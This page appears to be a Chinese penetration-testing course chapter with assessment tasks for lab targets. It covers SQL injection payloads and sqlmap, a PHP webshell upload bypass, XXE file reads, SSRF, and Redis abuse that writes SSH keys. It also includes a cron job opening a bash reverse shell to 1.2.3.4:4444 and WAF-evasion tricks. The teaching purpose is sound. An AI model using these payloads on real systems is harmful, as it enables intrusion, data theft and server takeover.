当前位置: 首页 > news >正文

课程与考核

6.1 课程讲解与实战考核

6.1.1 SQL注入篇考核

考核目标:通过手动注入与工具结合,获取目标数据库敏感信息。

题目示例

  • 目标URL:http://vuln-site.com/product?id=1

  • 要求:

  1. 判断注入类型(联合查询/报错注入/布尔盲注)。

  2. 获取数据库名称、表名及用户密码字段。

  3. 使用Sqlmap自动化验证结果。

解题思路

  1. 探测注入点

http://vuln-site.com/product?id=1' AND 1=1-- // 正常响应 http://vuln-site.com/product?id=1' AND 1=2-- // 异常响应 
  1. 联合查询注入

' ORDER BY 3-- // 确定字段数为3 ' UNION SELECT 1,2,database()-- 
  1. Sqlmap自动化

sqlmap -u "http://vuln-site.com/product?id=1" --risk=3 --level=5 --dump 

6.1.2 文件上传绕过考核

考核目标:绕过黑名单校验上传Webshell。

题目场景

  • 网站仅允许上传.jpg文件,且检测文件头与Content-Type。

  • 目标:上传PHP Webshell并触发执行。

绕过步骤

  1. 文件头伪造:在Webshell开头添加GIF89a

  2. 双扩展名绕过:命名文件为shell.jpg.php

  3. Burp修改Content-Type


POST /upload.php HTTP/1.1 Content-Type: multipart/form-data Content-Disposition: form-data; name="file"; filename="shell.jpg" Content-Type: image/jpeg <?php system($_GET['cmd']); ?> 

6.1.3 XXE与SSRF实战考核

考核目标:利用XXE读取服务器文件,并通过SSRF攻击内网服务。

题目环境

  • 目标接口:XML数据解析端点(/api/parse)。

  • 内网存在未授权Redis服务(192.168.1.100:6379)。

解题步骤

  1. XXE读取/etc/passwd

<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <data>&xxe;</data> 
  1. SSRF探测内网Redis

<!DOCTYPE test [<!ENTITY ssrf SYSTEM "http://192.168.1.100:6379">]> 
  1. Redis未授权写SSH密钥

redis-cli -h 192.168.1.100 flushall echo -e "\n\nssh-rsa AAAAB3NzaC... user@kali" | redis-cli -h 192.168.1.100 -x set payload redis-cli -h 192.168.1.100 config set dir /root/.ssh redis-cli -h 192.168.1.100 config set dbfilename "authorized_keys" redis-cli -h 192.168.1.100 save 

6.2 扩展知识与高阶技巧

6.2.1 常见WAF绕过技巧

  • 分块传输编码

POST /login.php HTTP/1.1 Transfer-Encoding: chunked 7\r\n user=ad\r\n 6\r\n min&pass=1\r\n 0\r\n 
  • 注释符混淆

' UN/**/ION SEL/**/ECT 1,2,3-- 

6.2.2 未授权漏洞实战(Redis)

攻击链

  1. 发现Redis未授权访问:nmap -p 6379 192.168.1.0/24

  2. 写入定时任务反弹Shell:


redis-cli -h 192.168.1.100 config set dir /var/spool/cron config set dbfilename root set payload "* * * * * bash -i >& /dev/tcp/1.2.3.4/4444 0>&1" save 

6.3 考核评分标准
  • 基础分(60%):完成漏洞利用的核心步骤(如注入成功、文件上传、权限获取)。

  • 进阶分(30%):绕过防御机制(如WAF、加密参数)。

  • 创新分(10%):提出新颖攻击链或自动化脚本(如结合多个漏洞横向移动)。


模拟考核环境搭建指南

  1. Docker快速部署漏洞靶场

docker run -d -p 80:80 vulnerables/web-dvwa 
  1. Kali工具集成:预装Sqlmap、Burp Suite、CobaltStrike。

  2. 日志监控:使用ELK堆栈记录攻击行为,用于事后复盘。


下期预告

终章:综合实战演练——从信息收集到内网渗透,还原真实红队攻击全流程!

相关文章:

课程与考核

6.1 课程讲解与实战考核 6.1.1 SQL注入篇考核 考核目标&#xff1a;通过手动注入与工具结合&#xff0c;获取目标数据库敏感信息。 题目示例&#xff1a; 目标URL&#xff1a;http://vuln-site.com/product?id1 要求&#xff1a; 判断注入类型&#xff08;联合查询/报错注…...

CNN、RNN、Transformer对于长距离依赖的捕捉能力分析

卷积网络CNN主要依靠深度来捕捉长距离依赖。但这个过程太间接了&#xff0c;因为信息在网络中实际传播了太多层。究竟哪些信息被保留&#xff0c;哪些被丢弃了&#xff0c;弄不清楚。从实践经验来看&#xff0c;卷积网络捕捉长依赖的能力非常弱。这也是为什么在大多数需要长依赖…...

封装POD与PinMap文件总结学习-20250516

基本概念 芯片封装外形图&#xff08;POD&#xff0c;Package Outline Drawing&#xff09;&#xff0c;详细描述了芯片的物理尺寸、引脚布局和封装类型等信息&#xff1b; Pin Map是芯片封装的一个重要概念。它是一张详细描述芯片封装外形上各个引脚&#xff08;Pin&#xff…...

Qt项目开发中所遇

讲述下面代码所表示的含义&#xff1a; QWidget widget_19 new QWidget(); QVBoxLayout *touchAreaLayout new QVBoxLayout(widget_19);QWidget *buttonArea new QWidget(widget_19); 1、新建一个名为widget_19的QWidget&#xff0c;将给其应用垂直管路布局。 2、新建一个…...

ubuntu chrome无法使用搜狗拼音输入法,无法输入中文

安装好搜狗输入法后用了很久&#xff0c;突然有一天点击chrome自动升级后就没法用了&#xff0c;在别的软件都能用&#xff0c;还以为是配置问题&#xff0c;就在网上搜了好一阵子才找到解决方案&#xff0c;各种找问题&#xff0c;最后发现是需要安装fcitx5-frontend-gtk4&…...

数据结构与算法分析实验14 实现基本排序算法

实现基本排序算法 1. 常用的排序算法简介2. 上机要求3. 上机环境4.程序清单(写明运行结果及结果分析)4.1 程序清单4.1.1 头文件 sort.h 内容如下&#xff1a;4.1.2 实现文件 sort.cpp 内容如下&#xff1a;4.1.3 源文件 main.cpp 内容如下&#xff1a; 4.2 实现展效果示 5.上机…...

uni-app 中使用 mumu模拟器 进行调试和运行详细教程

一、下载mumu模拟器 二、复制安装路径暴保留 在文件夹中打开 三、配置全局adb命令 adb为Android Debug Bridge&#xff0c;就是起到调试桥的作用 打开shell文件夹、里面有一个adb.exe 将当前文件夹地址复制一下&#xff0c;即‘D:\Program Files\Netease\MuMu Player 12\sh…...

Visual Studio Code 改成中文模式(汉化)

1、打开工具软件&#xff08;双击打开&#xff09; 2、软件左边图标点开 3、在搜索框&#xff0c;搜索 chinese 出现的第一个 就是简体中文 4、点击第一个简体中文&#xff0c;右边会出来基本信息 点击 install 就可以安装了&#xff08;记得联网&#xff09;。 5、安装完右…...

破解 PCB 制造四大痛点:MOM 系统构建智能工厂新范式

在全球电子信息产业加速向智能化、高端化转型的背景下&#xff0c;PCB&#xff08;印制电路板&#xff09;作为 "电子产品之母"&#xff0c;既是支撑 5G 通信、新能源汽车、人工智能等战略新兴产业发展的核心基础部件&#xff0c;也面临着 "多品种小批量快速切换…...

【基于深度学习的非线性光纤单像素超高速成像】

基于深度学习的非线性光纤单像素超高速成像是一种结合深度学习技术和单像素成像方法的前沿技术&#xff0c;旨在实现高速、高分辨率的成像。以下是一些关键点和方法&#xff1a; 深度学习在单像素成像中的应用 深度学习技术可以通过训练神经网络来优化单像素成像的重建过程。…...

Backend - Oracle SQL

目录 一、CRUD 增删改查&#xff08;基础&#xff09; &#xff08;一&#xff09;查询 &#xff08;二&#xff09;插入 &#xff08;三&#xff09;更新 &#xff08;四&#xff09;清空 二、常用 SQL 1. exists 搭配 select 1 2. FROM DUAL 3. INSTR()函数 4. 提取…...

WebSocket心跳机制

通常&#xff0c;心跳机制包括&#xff1a; 定期发送消息(如ping)到服务器以保持连接活跃检测服务器的相应(pong)如果一段时间没有收到相应&#xff0c;可能需要重新连接 ::: warning 在连接关闭或者发生错误时&#xff0c;清除心跳定时器&#xff0c;避免内存泄漏 ::: 在实现…...

计算机视觉与深度学习 | PSO-MVMD粒子群算法优化多元变分模态分解(Matlab完整代码和数据)

以下是一个基于PSO优化多元变分模态分解(MVMD)的Matlab示例代码框架,包含模拟数据生成和分解结果可视化。用户可根据实际需求调整参数。 %% 主程序:PSO优化MVMD参数 clc; clear; close all;% 生成模拟多变量信号 fs = 1000; % 采样频率 t = 0:1/fs:...

Fast Video Cutter Joiner v6.8.2 视频剪切合并器汉化版

想要快速拆解冗长视频&#xff0c;或是将零散片段拼接成完整作品&#xff1f;Fast Video Cutter Joiner 正是你需要的宝藏视频编辑软件&#xff01;它以强大功能为核心&#xff0c;将复杂的视频处理变得简单直观。​ 精准的切割与合并功能&#xff0c;让你能随心所欲地裁剪视频…...

【漫话机器学习系列】269.K-Means聚类算法(K-Means Clustering)

一、K-Means 聚类算法简介 K-Means 是一种基于距离的无监督机器学习算法&#xff0c;属于聚类算法&#xff08;Clustering Algorithm&#xff09;。它的目标是将数据集划分为 K 个不重叠的子集&#xff08;簇&#xff09;&#xff0c;使得每个子集中的数据点尽可能相似&#x…...

【北邮通信系统建模与仿真simulink笔记】(1)主要用到的模块库介绍

【声明】 本博客仅用于记录博主学习内容、分享笔记经验&#xff0c;不得用作其他非学术、非正规用途&#xff0c;不得商用。本声明对本博客永久生效&#xff0c;若违反声明所导致的一切后果&#xff0c;本博客均不负责。 目录 1、信号源模块库&#xff08;Sources&#xff09…...

【信息系统项目管理师】第11章:项目成本管理 - 32个经典题目及详解

更多内容请见: 备考信息系统项目管理师-专栏介绍和目录 文章目录 【第1题】【第2题】【第3题】【第4题】【第5题】【第6题】【第7题】【第8题】【第9题】【第10题】【第11题】【第12题】【第13题】【第14题】【第15题】【第16题】【第17题】【第18题】【第19题】【第20题】【第…...

Java转Go日记(四十四):Sql构建

1.1.1. 执行原生SQL db.Exec("DROP TABLE users;")db.Exec("UPDATE orders SET shipped_at? WHERE id IN (?)", time.Now, []int64{11,22,33})// Scantype Result struct {Name stringAge int}var result Resultdb.Raw("SELECT name, age FROM use…...

数组day2

209长度最小的子数组 class Solution { public:int minSubArrayLen(int s, vector<int>& nums) {int result INT32_MAX;int sum 0; // 滑动窗口数值之和int i 0; // 滑动窗口起始位置int subLength 0; // 滑动窗口的长度for (int j 0; j < nums.size(); j) …...

《Effective Python》第三章 循环和迭代器——永远不要在迭代容器的同时修改它们

引言 本文基于《Effective Python: 125 Specific Ways to Write Better Python, 3rd Edition》第3章“循环和迭代器”中的 Item 22&#xff1a;“Never Modify Containers While Iterating over Them; Use Copies or Caches Instead&#xff08;永远不要在迭代容器的同时修改它…...

SQLite基础及优化

SQLite 什么是SQLite SQLite&#xff0c;是一款轻型的数据库&#xff0c;是遵守ACID的关系型数据库管理系统&#xff0c;它包含在一个相对小的C库中。它是D.RichardHipp建立的公有领域项目。它的设计目标是嵌入式的&#xff0c;而且目前已经在很多嵌入式产品中使用了它&#…...

数据库与存储安全

2.1 SQL注入攻防实战(手工注入、自动化工具) 攻击原理与分类 联合查询注入:通过UNION SELECT窃取数据。 UNION SELECT 1,username,password FROM users-- 布尔盲注:利用页面响应差异逐位提取数据。 AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)=a-- 时间…...

vue3/vue2大屏适配

vue3-scale-box 和 vue2-scale-box 可以帮助你在不同 Vue 版本中实现大屏自适应缩放。vue3-scale-box - npmvue3 scale box. Latest version: 0.1.9, last published: 2 years ago. Start using vue3-scale-box in your project by running npm i vue3-scale-box. There is 1 o…...

【数据结构 -- AVL树】用golang实现AVL树

目录 引言定义旋转方式LL型RR型LR型RL型 实现结构获取结点高度平衡因子更新高度左旋右旋插入结点中序遍历 引言 AVL树&#xff0c;基于二叉搜索树通过平衡得到 前面我们知道&#xff0c;通过&#x1f517;二叉搜索树可以便捷快速地查找到数据&#xff0c;但是当序列有序时&am…...

matlab慕课学习3.5

于20250520 3.5 用while 语句实现循环结构 3.5.1while语句 多用于循环次数不确定的情况&#xff0c;循环次数确定的时候用for更为方便。 3.5.2break语句和continue语句 break用来跳出循环体&#xff0c;结束整个循环。 continue用来结束本次循环&#xff0c;接着执行下一次…...

【jmeter】base64加密

base64加密 执行的脚本&#xff1a; import java.io.*; import sun.misc.BASE64Encoder; String strvars.get("param") #设置了一个user paramBASE64Encoder encodernew BASE64Encoder() log.info("--------start----------") String resultencoder.encod…...

优化Hadoop性能:如何修改Block块大小

在处理大数据时&#xff0c;Hadoop的性能和资源管理是至关重要的。Hadoop的分布式文件系统&#xff08;HDFS&#xff09;将数据切割成多个块&#xff08;Block&#xff09;&#xff0c;并将这些块分布在集群中的不同节点上。在默认情况下&#xff0c;HDFS的块大小可能并不适合所…...

jmeter转义unicode变成中文

打开jmeter&#xff0c;添加后置处理器到接口请求后&#xff0c;在添加完成后将代码复制进入 &#xff08;注意&#xff1a;最后执行后需要到“察看结果树”里看&#xff0c;需要自行添加对应的监听器&#xff09; 按如下添加代码进入上图位置&#xff1a; //如下复制于链接&…...

ALSA 插件是什么? PortAudio 断言失败是什么意思?

下面用更简单的语言和图文形式帮你理解&#xff1a; 1. ALSA 插件是什么&#xff1f;为什么重要&#xff1f; 想象你电脑里的音频系统就像一个厨房&#xff0c;ALSA 是厨房里的厨师&#xff0c;负责做出声音&#xff08;做菜&#xff09;和收集声音&#xff08;收菜&#xff0…...

计算机科技笔记: 容错计算机设计05 n模冗余系统 双模冗余系统 Duplex Systems

接收测试 测试 &#xff08;HA服务器的方法&#xff09; HA系统 一、基本HA结构 当前常用的HA&#xff08;High Availability&#xff09;系统结构大体如下&#xff1a; 双机结构&#xff1a;两台主机&#xff08;可称为主机A和主机B&#xff09; 两种运行模式&#xff1a; A…...

Translational Psychiatry | 注意缺陷多动障碍儿童延迟厌恶的行为与神经功能特征茗创科技茗创科技

摘要 尽管已有大量研究致力于解析注意缺陷多动障碍(ADHD)中的认知异质性&#xff0c;但对其动机变化(尤其是延迟厌恶)的探索仍相对有限。本研究旨在通过识别ADHD儿童的同质性延迟厌恶特征来理解其动机缺陷&#xff0c;采用体验式延迟贴现任务对43名ADHD儿童和47名对照参与者(经…...

MYSQL备份恢复知识:第四章:备份锁

为了获得备份数据的一致性&#xff0c;需要在数据库中加锁&#xff0c;保证在备份期间没有数据变化。早期版本的MySQL仅支持表级锁&#xff0c;在加锁期间不允许访问数据库&#xff0c;这对生产环境是极大的挑战。因此&#xff0c;在后续版本中引入了实例级锁&#xff0c;使得备…...

寻找最优美做题曲线

题目描述 一个有趣的评测功能&#xff0c;就是系统自动绘制出用户的“做题曲线”。所谓做题曲线就是一条曲线&#xff0c;或者说是折线&#xff0c;是这样定义的&#xff1a;假设某用户在第 bi​ 天 AC 了 ci​ 道题&#xff0c;并且 bi​ 严格递增&#xff0c;那么该用户的做…...

DeepSeek-V3 vs GPT-4:技术对比与性能评测

DeepSeek-V3 vs GPT-4&#xff1a;技术对比与性能评测 系统化学习人工智能网站&#xff08;收藏&#xff09;&#xff1a;https://www.captainbed.cn/flu 文章目录 DeepSeek-V3 vs GPT-4&#xff1a;技术对比与性能评测摘要引言技术架构对比1. 模型结构&#xff1a;稠密模型 …...

【Fifty Project - D29】

今日完成记录 TimePlan完成情况7&#xff1a;30 - 9&#xff1a;00大论文修改以及小论文修改√9&#xff1a;00 - 9&#xff1a;30整理近期购置物品项√9&#xff1a;30 - 10&#xff1a;00约了个画稿做个毕业冰箱贴&#xff01;√10&#xff1a;00 - 11&#xff1a;30Leetcod…...

创建一个使用 GPT-4o 和 SERP 数据的 RAG 聊天机器人

亮数据-网络IP代理及全网数据一站式服务商屡获殊荣的代理网络、强大的数据挖掘工具和现成可用的数据集。亮数据&#xff1a;网络数据平台领航者https://www.bright.cn/?promogithub15?utm_sourceorganic-social-cn&utm_campaigncsdn 本指南将解释如何使用 Python、GPT-4…...

安装PostgresSQL

目录 安装postgressql所需的依赖环境 编译安装 解压源码包 切换目录 --prefix指定安装目录 编译以及安装 配置环境创建用户 创建数据存储目录 更改数据存储目录的归属用户 配置环境变量 登录数据库 Dnf安装 安装postgresql 初始化数据库 登录数据库 postgresql…...

PL/SQL 安装配置与使用

目录 一、安装与配置 &#xff08;一&#xff09;下载PLSQL Developer &#xff08;二&#xff09;下载并配置免安装Oracle客户端 1. 下载Instantclient_11_2 2. 配置环境 &#xff08;1&#xff09;配置电脑的环境变量 &#xff08;2&#xff09;配置PLSQL Developer的…...

Oracle RAC ADG备库版本降级方案(19.20 → 19.7)

Oracle RAC ADG备库版本降级方案&#xff08;19.20 → 19.7&#xff09; 一、前期准备 1.1环境验证 主库版本&#xff1a;19.7 备库版本&#xff1a;19.20 检查兼容性&#xff1a;确认Oracle 19.20补丁是否支持回滚至19.7 1.2备份与快照 对备库数据库进行全量备份&#…...

SpringBoot-4-Spring Boot项目配置文件和日志配置

文章目录 1 项目全局配置文件1.1 配置示例1.2 配置文件加载顺序2 通过配置文件注入配置项2.1 使用@Value注解注入属性2.2 使用@ConfigurationProperties注入2.3 配置注入的注意事项2.4 配置文件中引用已定义值3 Spring Boot的日志配置3.1 引入日志依赖器3.2 自定义日志格式3.3 …...

mac上安装 Rust 开发环境

1.你可以按照提示在终端中执行以下命令&#xff08;安全、官方支持&#xff09;&#xff1a; curl --proto https --tlsv1.2 -sSf https://sh.rustup.rs | sh然后按提示继续安装即可。 注意&#xff1a;安装过程中建议选择默认配置&#xff08;按 1 即可&#xff09;。 如果遇…...

微软押注“代理式AI网络”:一场重塑软件开发与工作方式的技术革命

在 2025 年 Build 开发者大会上&#xff0c;微软正式发布了其面向“开放代理式网络&#xff08;Open Agentic Web&#xff09;”的宏大战略&#xff0c;推出超过 50 项 AI 相关技术更新&#xff0c;涵盖 GitHub、Azure、Windows 和 Microsoft 365 全线产品。这一系列更新的核心…...

鸿蒙HarmonyOS多设备流转:分布式的智能协同技术介绍

随着物联网和智能设备的普及&#xff0c;多设备间的无缝协作变得越来越重要。鸿蒙&#xff08;HarmonyOS&#xff09;作为华为推出的新一代操作系统&#xff0c;其分布式技术为实现多设备流转提供了强大的支持。本文将详细介绍鸿蒙多设备流转的技术原理、实现方式和应用场景。 …...

精益数据分析(71/126):从移情到黏性——创业阶段的关键跨越与数据驱动策略

精益数据分析&#xff08;71/126&#xff09;&#xff1a;从移情到黏性——创业阶段的关键跨越与数据驱动策略 在创业的旅程中&#xff0c;从需求验证的“移情阶段”过渡到产品黏性构建的“黏性阶段”&#xff0c;是决定创业成败的关键转折。今天&#xff0c;我们结合《精益数…...

21. 自动化测试框架开发之Excel配置文件的测试用例改造

21. 自动化测试框架开发之Excel配置文件的测试用例改造 一、测试框架核心架构 1.1 组件依赖关系 # 核心库依赖 import unittest # 单元测试框架 import paramunittest # 参数化测试扩展 from chap3.po import * # 页面对象模型 from file_reader import E…...

学习vue3:监听器

目录 一&#xff0c;关于监听的概述 二&#xff0c;手动监听器&#xff08;watch函数) watch&#xff08;&#xff09;函数语法 监听基本数据类型 监听对象&#xff0c;对象属性 三&#xff0c;自动监听器&#xff08;watchEffect函数&#xff09; watchEffect()函数语法…...

十大排序算法--快速排序

目录 原理 第一步 第二步 代码 递归实现快速排序 原理 分治法核心步骤 选择基准值&#xff08;Pivot&#xff09; 从数组中选一个元素作为基准值&#xff08;如最右侧元素、中间元素或随机元素&#xff09;。 分区&#xff08;Partition&#xff09; 将数组分为两部分…...

基于Docker搭建Harbor私有镜像仓库

Harbor 是 VMware 开源的企业级 Docker 容器镜像仓库&#xff0c;支持镜像存储、访问控制、镜像复制、安全扫描、审计日志等功能&#xff0c;适合企业级私有化部署。 1.前置环境说明 Harbor的部署依赖于Docker和Docker Compose环境。鉴于Docker已在系统中完成安装&#xff0c;…...

CentOS 7上搭建高可用BIND9集群指南

在 CentOS 7 上搭建一个高可用的 BIND9 集群通常涉及以下几种关键技术和策略的组合&#xff1a;主从复制 (Master-Slave Replication)、负载均衡 (Load Balancing) 以及可能的浮动 IP (Floating IP) 或 Anycast。 我们将主要关注主从复制和负载均衡的实现&#xff0c;这是构成高…...

使用SQLite Studio导出/导入SQL修复损坏的数据库

使用SQLite Studio导出/导入SQL修复损坏的数据库 使用Zotero时遇到了数据库损坏&#xff0c;在软件中寸步难行&#xff0c;遂尝试修复数据库。 一、SQLite Studio简介 SQLite Studio是一款专为SQLite数据库设计的免费开源工具&#xff0c;支持Windows/macOS/Linux。相较于其…...